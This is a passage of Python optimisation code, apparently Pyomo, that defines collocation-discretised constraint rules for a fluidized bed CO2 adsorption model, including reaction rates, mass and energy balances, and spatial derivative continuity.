(m.P[it, jt, ix, jx] * m.yc[it, jt, ix, jx, 'c'] * 1E5) ** m.m1) -
((m.nc[it, jt, ix, jx, 'n'] * m.rhos / m.nv) * (
(m.nc[it, jt, ix, jx, 'n'] * m.rhos / m.nv) + (
m.nc[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) /
m.Ke3c[it, jt, ix, jx]))
else:
return Constraint.Skip
# r1e
def a73_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.r1e[it, jt, ix, jx] == m.k1e[it, jt, ix, jx] * ((m.P[it, jt, ix, jx] * m.ye[it, jt, ix, jx, 'h'] * 1E5) - (m.ne[it, jt, ix, jx, 'h'] * m.rhos / m.Ke1e[it, jt, ix, jx]))
else:
return Constraint.Skip
# r2e
def a74_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.r2e[it, jt, ix, jx] == m.k2e[it, jt, ix, jx] * (
(1. - 2. * (m.ne[it, jt, ix, jx, 'n'] * m.rhos / m.nv) -
(m.ne[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) * m.ne[it, jt, ix, jx, 'h'] * m.rhos * (
m.P[it, jt, ix, jx] * m.ye[it, jt, ix, jx, 'c'] * 1E5) -
(((m.ne[it, jt, ix, jx, 'n'] * m.rhos / m.nv) +
(m.ne[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) * m.ne[it, jt, ix, jx, 'c'] * m.rhos / m.Ke2e[
it, jt, ix, jx])
)
else:
return Constraint.Skip
# r3e
def a75_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.r3e[it, jt, ix, jx] == \
m.k3e[it, jt, ix, jx] * (
((1. - 2. * (m.ne[it, jt, ix, jx, 'n'] * m.rhos / m.nv) -
(m.ne[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) ** 2) * (
(m.P[it, jt, ix, jx] * m.ye[it, jt, ix, jx, 'c'] * 1E5) ** m.m1) -
((m.ne[it, jt, ix, jx, 'n'] * m.rhos / m.nv) * (
(m.ne[it, jt, ix, jx, 'n'] * m.rhos / m.nv) + (m.ne[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) /
m.Ke3e[it, jt, ix, jx]))
else:
return Constraint.Skip
# rgc 'c'
def a76_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rgc[it, jt, ix, jx, 'c'] == (m.nv * m.r3c[it, jt, ix, jx] + m.r2c[it, jt, ix, jx]) / 1000.
else:
return Constraint.Skip
# rge 'c'
def a77_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rge[it, jt, ix, jx, 'c'] == (m.nv * m.r3e[it, jt, ix, jx] + m.r2e[it, jt, ix, jx]) / 1000.
else:
return Constraint.Skip
# rsc 'c'
def a78_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rsc[it, jt, ix, jx, 'c'] == m.r2c[it, jt, ix, jx]
else:
return Constraint.Skip
# rse 'c'
def a79_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rse[it, jt, ix, jx, 'c'] == m.r2e[it, jt, ix, jx]
else:
return Constraint.Skip
# rgc 'h'
def a80_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rgc[it, jt, ix, jx, 'h'] == m.r1c[it, jt, ix, jx] / 1000
else:
return Constraint.Skip
# rge 'h'
def a81_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rge[it, jt, ix, jx, 'h'] == m.r1e[it, jt, ix, jx] / 1000
else:
return Constraint.Skip
# rsc 'h'
def a82_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rsc[it, jt, ix, jx, 'h'] == m.r1c[it, jt, ix, jx] - m.r2c[it, jt, ix, jx]
else:
return Constraint.Skip
# rse 'h'
def a83_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rse[it, jt, ix, jx, 'h'] == m.r1e[it, jt, ix, jx] - m.r2e[it, jt, ix, jx]
else:
return Constraint.Skip
# rgc 'n'
def a84_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rgc[it, jt, ix, jx, 'n'] == 0
else:
return Constraint.Skip
# rge 'n'
def a85_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rge[it, jt, ix, jx, 'n'] == 0
else:
return Constraint.Skip
# rsc 'n'
def a86_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rsc[it, jt, ix, jx, 'n'] == m.nv * m.r3c[it, jt, ix, jx]
else:
return Constraint.Skip
# rse 'n'
def a87_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rse[it, jt, ix, jx, 'n'] == m.nv * m.r3e[it, jt, ix, jx]
else:
return Constraint.Skip
# hsc
def a88_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.hsc[it, jt, ix, jx] == ((m.nc[it, jt, ix, jx, 'h'] + m.nc[it, jt, ix, jx, 'c']) * (m.cpgcsc['h'] * (m.Tsc[it, jt, ix, jx] - 273.16) + m.dH1) +
m.nc[it, jt, ix, jx, 'c'] * (m.cpgcsc['c'] * (m.Tsc[it, jt, ix, jx] - 273.16) + m.dH2) +
m.nc[it, jt, ix, jx, 'n'] * (m.cpgcsc['c'] * (m.Tsc[it, jt, ix, jx] - 273.16) + m.dH3)) * 1E-3 + m.cps * (m.Tsc[it, jt, ix, jx] - 273.16)
else:
return Constraint.Skip
# hse
def a89_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.hse[it, jt, ix, jx] == ((m.ne[it, jt, ix, jx, 'h'] + m.ne[it, jt, ix, jx, 'c']) * (m.cpgcse['h'] * (m.Tse[it, jt, ix, jx]-273.16) + m.dH1) +
m.ne[it, jt, ix, jx, 'c'] * (m.cpgcse['c'] * (m.Tse[it, jt, ix, jx]-273.16) + m.dH2) +
m.ne[it, jt, ix, jx, 'n'] * (m.cpgcse['c'] * (m.Tse[it, jt, ix, jx]-273.16) + m.dH3)) * 1E-3 + m.cps * (m.Tse[it, jt, ix, jx] - 273.16)
else:
return Constraint.Skip
# equation A.3 Gas phase component balance
# dNgc_dt
def de_ngc_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNgc_dt[it, jt, ix, jx, k] == \
(m.delta[it, jt, ix, jx] * m.Kbc[it, jt, ix, jx, k] * (m.cb[it, jt, ix, jx, k] - m.cc[it, jt, ix, jx, k]) - \
m.delta[it, jt, ix, jx] * m.Kce[it, jt, ix, jx, k] * (m.cc[it, jt, ix, jx, k] - m.ce[it, jt, ix, jx, k]) - \
m.delta[it, jt, ix, jx] * m.fcw[it, jt, ix, jx] * (1. - m.ed[it, jt, ix, jx]) * m.rgc[it, jt, ix, jx, k]) * \
m.hi_t[it]
else:
return Constraint.Skip
# equation A.4 Gas phase energy balance
# dHgc_dt
def de_hgc_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHgc_dt[it, jt, ix, jx] == \
(m.Ax * m.delta[it, jt, ix, jx] * \
m.Hbc[it, jt, ix, jx] * (m.Tgb[it, jt, ix, jx] - m.Tgc[it, jt, ix, jx]) - \
m.Ax * m.delta[it, jt, ix, jx] * \
m.Hce[it, jt, ix, jx] * (m.Tgc[it, jt, ix, jx] - m.Tge[it, jt, ix, jx]) - \
m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) * \
m.rhos * m.ap * m.hp[it, jt, ix, jx] * (m.Tgc[it, jt, ix, jx] - m.Tsc[it, jt, ix, jx]) - \
m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) * \
sum(m.rgc[it, jt, ix, jx, k] * m.cpgcgc[k] for k in m.sp) * m.Tgc[it, jt, ix, jx]) * m.hi_t[it]
else:
return Constraint.Skip
# equation A.5 Solid phase adsorbed species balance
# dNse_dt
def de_nsc_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNsc_dt[it, jt, ix, jx, k] * m.hi_x[ix] == \
(-m.dccwin_dx[it, jt, ix, jx, k] * m.Ax - m.Ksbulk[it, jt, ix, jx, k] - \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.nc[it, jt, ix, jx, k] - m.ne[it, jt, ix, jx, k]) + \
m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) *
m.rsc[it, jt, ix, jx, k]) * m.hi_t[it]
else:
return Constraint.Skip
# put derivative space here
# equation A.6 Solid phase energy balance
# dHsc_dt
def de_hsc_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHsc_dt[it, jt, ix, jx] * m.hi_x[ix] \
== (-m.decwin_dx[it, jt, ix, jx] * m.Ax - m.Hsbulk[it, jt, ix, jx] - \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (m.hsc[it, jt, ix, jx] - m.hse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (
1 - m.ed[it, jt, ix, jx]) * sum((m.rgc[it, jt, ix, jx, k] * m.cpgcgc[k]) for k in m.sp) * (m.Tgc[it, jt, ix, jx]) + \
m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (
1 - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
m.Tgc[it, jt, ix, jx] - m.Tsc[it, jt, ix, jx])) * m.hi_t[it]
else:
return Constraint.Skip
# equation A.7 Gas phase component balance
# dNge_dt
def de_nge_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNge_dt[it, jt, ix, jx, k] \
== (m.Ax * m.delta[it, jt, ix, jx] * m.Kce[it, jt, ix, jx, k] * (
m.cc[it, jt, ix, jx, k] - m.ce[it, jt, ix, jx, k]) - \
m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * m.rge[
it, jt, ix, jx, k] - \
m.Kgbulk[it, jt, ix, jx, k] / m.hi_x[ix]) * m.hi_t[it]
else:
return Constraint.Skip
# equation A.8 Gas phase energy balance
# dHge_dt
def de_hge_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHge_dt[it, jt, ix, jx] \
== (m.Ax * m.delta[it, jt, ix, jx] * m.Hce[it, jt, ix, jx] * (
m.Tgc[it, jt, ix, jx] - m.Tge[it, jt, ix, jx]) - \
m.Ax * (1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
m.Tge[it, jt, ix, jx] - m.Tse[it, jt, ix, jx]) - \
m.Hgbulk[it, jt, ix, jx] / m.hi_x[ix] - \
m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * \
sum(m.rge[it, jt, ix, jx, k] * m.cpgcge[k] for k in m.sp) * m.Tge[it, jt, ix, jx]) * m.hi_t[it]
else:
return Constraint.Skip
# put derivative space here
# equation A.9 Solid phase adsorbed species balance
# dNse_dt
def de_nse_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNse_dt[it, jt, ix, jx, k] * m.hi_x[ix] == \
(m.dcein_dx[it, jt, ix, jx, k] * m.Ax + m.Ksbulk[it, jt, ix, jx, k] + \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.nc[it, jt, ix, jx, k] - m.ne[it, jt, ix, jx, k]) + \
m.hi_x[ix] * m.Ax * (
1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1 - m.ed[it, jt, ix, jx]) * m.rse[it, jt, ix, jx, k]) * m.hi_t[it]
else:
return Constraint.Skip
# put derivative space here
# equation A.10 Solid phase energy balance
# dHse_dt
def de_hse_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHse_dt[it, jt, ix, jx] * m.hi_x[ix] == \
(m.deein_dx[it, jt, ix, jx] * m.Ax + m.Hsbulk[it, jt, ix, jx] + \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.hsc[it, jt, ix, jx] - m.hse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.Ax * (
1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1 - m.ed[it, jt, ix, jx]) * \
sum((m.rge[it, jt, ix, jx, k] * m.cpgcge[k]) for k in m.sp) * m.Tge[it, jt, ix, jx] + \
m.hi_x[ix] * m.Ax * (
1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
m.Tge[it, jt, ix, jx] - m.Tse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.pi * m.dx * m.ht[it, jt, ix, jx] * m.dThx[it, jt, ix, jx] * m.Nx * m.Cr) * m.hi_t[it]
else:
return Constraint.Skip
# shift the AV?
# dz_dx
def dex_z_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dz_dx[it, jt, ix, jx] == 0
else:
return Constraint.Skip
# Kgbulk
def i1_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Kgbulk[it, jt, ix, jx, k] == m.K_d * (sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp) - sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)) * m.yb[it, jt, ix, jx, k]
else:
return Constraint.Skip
# Hgbulk
def i2_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Hgbulk[it, jt, ix, jx] == m.K_d * (sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp) - sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)) * m.cpg_mol * \
m.Tgb[it, jt, ix, jx]
else:
return Constraint.Skip
# Kgbulk
# oddly derivative looking term here and in the next one
# definetly derivatives e19 and e20 from bfb ss paper
def i3_rule(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.Ksbulk[it, kt, ix, kx, c] == \
-m.Ax * sum(m.lydot[jx, kx] * m.Jc[it, kt, ix, jx] for jx in m.cp_x if 0 < jx <= m.ncp_x) * m.ne[it, kt, ix, kx, c]
else:
return Constraint.Skip
# Hsbulk
# m.Jc[it, jt, ix, jx]-m.Jc[i-1]
def i4_rule(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.Hsbulk[it, kt, ix, kx] == \
-m.Ax * sum(m.lydot[jx, kx] * m.Jc[it, kt, ix, jx] for jx in m.cp_x if 0 < jx <= m.ncp_x) * m.hse[
it, kt, ix, kx]
# elif j == m.ncp_x:
# return m.Hsbulk[it, jt, ix, jx] == -m.Ax * (m.Jc[it, jt, ix, jx] - m.Jc[i, j - 1]) * m.hse[it, jt, ix, jx]
else:
return Constraint.Skip
# db
def i5_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.db[it, jt, ix, jx] == m.dbu[it, jt, ix, jx]
else:
return Constraint.Skip
# vb
def i6_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.vb[it, jt, ix, jx] == \
1.55 * ((m.vg[it, jt, ix, jx] - m.vmf[it, jt]) + 14.1 * (m.db[it, jt, ix, jx] + 0.005)) * (
m.Dte ** 0.32) + m.vbr[it, jt, ix, jx]
else:
return Constraint.Skip
# ed
def i7_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return (1 - m.emf) * ((m.dp ** 0.1) * (m.gc ** 0.118) * 2.05 * (m.l[ix, jx] ** 0.043)) == \
2.54 * (m.mug ** 0.066) * (1. - m.ed[it, jt, ix, jx])
else:
return Constraint.Skip
# ve
def i8_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.ve[it, jt, ix, jx] * ((m.dp ** 0.568) * (m.gc ** 0.663) * (0.08518 * (m.rhos - m.rhog[it, jt, ix, jx]) + 19.09) * ((m.l[ix, jx]) ** 0.244)) == \
m.vmf[it, jt] * 188. * 1.02 * (m.mug ** 0.371)
else:
return Constraint.Skip
# exchanger pressure drop
# HXIn_h
def e1_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.HXIn_h[it, jt] == -0.2831 - 2.9863e-6 * (m.HXIn_P - 1.3) + 7.3855e-05 * (m.HXIn_T - 60 - 273.15)
else:
return Constraint.Skip
# hsint
def e5_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.hsint[it, jt] == \
((m.nin['h'] + m.nin['c']) * (m.cpgcst['h'] * (m.SolidIn_T - 273.15) + m.dH1) + m.nin['c'] * (m.cpgcst['c'] * (m.SolidIn_T - 273.15) + m.dH2) + m.nin['n'] * (m.cpgcst['c'] * (m.SolidIn_T - 273.15) + m.dH3)) * 1E-3 + m.cps * (m.SolidIn_T - 273.15)
else:
return Constraint.Skip
# cein
def fdvar_x_cein_(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dcein_dx[it, kt, ix, kx, c] == \
sum(m.ldot_x[jx, kx] * m.cein[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ecwin
def fdvar_x_ecwin_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.decwin_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.ecwin[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# eein
def fdvar_x_eein_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.deein_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.eein[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# hxh:q
def fdvar_x_hxh_(m, it, kt, ix, kx): #
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dhxh_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.hxh[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Phx
def fdvar_x_phx_(m, it, kt, ix, kx): #
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dPhx_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.Phx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ccwin
def fdvar_x_ccwin_(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dccwin_dx[it, kt, ix, kx, c] == \
sum(m.ldot_x[jx, kx] * m.ccwin[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# z
def fdvar_z_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dz_dx[it, kt, ix, kx] == sum(
m.ldot_x[jx, kx] * m.z[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ceini0
def fcp_x_cein(m, it, kt, ix, c):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.cein[it, kt, ix + 1, 0, c] == \
sum(m.l1_x[jx] * m.cein[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ecwini0
def fcp_x_ecwin(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.ecwin[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.ecwin[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# eeini0
def fcp_x_eein(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.eein[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.eein[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# hxhi0
def fcp_x_hxh(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.hxh[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.hxh[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Phxi0
def fcp_x_phx(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.Phx[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.Phx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ccwini0
def fcp_x_ccwin(m, it, kt, ix, c):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.ccwin[it, kt, ix + 1, 0, c] == \
sum(m.l1_x[jx] * m.ccwin[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# zi0
def fcp_z_(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.z[it, kt, ix + 1, 0] == sum(m.l1_x[jx] * m.z[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_cein(m, it, kt, c):
if 0 < kt <= m.ncp_t:
return m.cein_l[it, kt, c] == sum(m.l1_x[jx] * m.cein[it, kt, m.nfe_x, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_ecwin(m, it, kt):
if 0 < kt <= m.ncp_t:
return m.ecwin_l[it, kt] == sum(m.l1_x[jx] * m.ecwin[it, kt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_eein(m, it, kt):
if 0 < kt <= m.ncp_t:
return m.eein_l[it, kt] == sum(m.l1_x[jx] * m.eein[it, kt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_hxh(m, it, kt):
if 0 < kt <= m.ncp_t:
return m.hxh_l[it, kt] == sum(m.l1_x[jx] * m.hxh[it, kt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_phx(m, it, kt):
if 0 < kt <= m.ncp_t:
return m.Phx_l[it, kt] == sum(m.l1_x[jx] * m.Phx[it, kt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
def fzl_ccwin(m, it, kt, c):
if 0 < kt <= m.ncp_t:
return m.ccwin_l[it, kt, c] == sum(m.l1_x[jx] * m.ccwin[it, kt, m.nfe_x, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# def fzl_z(m, it, kt):
# if 0 < kt <= m.ncp_t:
# return m.z_l[it, kt] ==
# else:
# return Constraint.Skip
# hse_l
def fyl_hse(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.hse_l[it, jt] == sum(m.l1y[jx] * m.hse[it, jt, m.nfe_x, jx] for jx in m.cp_x if 0 < jx <= m.ncp_x)
else:
return Constraint.Skip
# ne_l
def fyl_ne(m, it, jt, c):
if 0 < jt <= m.ncp_t:
return m.ne_l[it, jt, c] == sum(m.l1y[jx] * m.ne[it, jt, m.nfe_x, jx, c] for jx in m.cp_x if 0 < jx <= m.ncp_x)
else:
return Constraint.Skip
# cb_l
def fzl_cb(m, it, jt, c):
if 0 < jt <= m.ncp_t:
return m.cb_l[it, jt, c] == sum(m.l1_x[jx] * m.cb[it, jt, m.nfe_x, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ccapture
def cc_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.c_capture[it, jt] == \
1 - (m.GasOut_F[it, jt] * m.GasOut_z[it, jt, 'c']) / (m.GasIn_F[it] * m.GasIn_z[it, 'c'])
else:
return Constraint.Skip
# 1st order Derivative variables in space
# ddx vb
def fdvar_x_vg_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dvg_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.vg[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ddx Gb
def fdvar_x_Gb_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dGb_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.Gb[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ddx cb
def fdvar_x_cb_(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dcb_dx[it, kt, ix, kx, c] == \
sum(m.ldot_x[jx, kx] * m.cb[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ddx Tb
def fdvar_x_Tgb_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dTgb_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.Tgb[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# ddx P
def fdvar_x_P_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dP_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.P[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Continuation in space
# vb
def fcp_x_vb(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.vg[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.vg[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Gb
def fcp_x_Gb(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.Gb[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.Gb[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# cb
def fcp_x_cb(m, it, kt, ix, c):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.cb[it, kt, ix + 1, 0, c] == \
sum(m.l1_x[jx] * m.cb[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Tgb
def fcp_x_Tgb(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.Tgb[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.Tgb[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# P
def fcp_x_P(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.P[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.P[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# 2nd order Derivative variables in space
# d2dx2 vb
def fdvar_x_dvg_dx_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dvgx_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.vgx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# d2dx2 cb
def fdvar_x_dcb_dx_(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dcbx_dx[it, kt, ix, kx, c] == \
sum(m.ldot_x[jx, kx] * m.cbx[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# d2dx2 Tb
